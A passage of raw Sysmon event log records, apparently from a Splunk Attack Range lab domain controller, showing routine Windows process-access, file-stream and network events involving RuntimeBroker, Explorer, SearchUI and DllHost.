PCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.838{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.838{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.735{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.734{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.734{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.734{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001048477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.721{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58A8B725A5EDB119E11B237DC953198C,SHA256=DDBE60D8FE2103D71515ACFA1DA23A62A035A11CAA19F56F31F8E04130C1C406,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.705{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=38F80956A64CF089AD0933427D7705C7,SHA256=E3D4765BBC78EF0C4B812AE494DF8E3C5B6A82DADBC3BB379387ED9CA10C1A20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.677{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.677{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 354300x80000000000000001048473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:35.602{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51015-false10.0.1.12-8000- 10341000x80000000000000001048472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.639{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.639{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.639{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.631{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.628{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.628{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+3dbed|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.622{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=38F80956A64CF089AD0933427D7705C7,SHA256=E3D4765BBC78EF0C4B812AE494DF8E3C5B6A82DADBC3BB379387ED9CA10C1A20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.616{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.612{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.612{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001048462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.415{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=A34545FAA044B15F00FD539895EE14A4,SHA256=630E6786C077CC7648703A36C5BAFF0B6F482BCBE57B85651028140417CE9B20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.344{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.344{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 